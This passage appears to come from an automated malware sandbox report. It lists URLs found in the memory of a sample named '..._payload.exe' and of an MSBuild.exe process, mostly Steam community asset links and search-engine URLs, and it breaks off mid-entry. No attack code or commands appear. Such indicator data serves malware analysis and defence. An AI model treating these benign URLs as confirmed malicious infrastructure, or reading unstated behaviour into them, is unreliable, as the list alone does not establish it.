https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: MSBuild.exe, 00000006.00000002.2344932078.0000000001308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.a
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	String found in binary or memory: https://community.akamai.steamstatic.com/public/
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=zGRpBs82SFHJ&a
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=GG0UCGgA
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 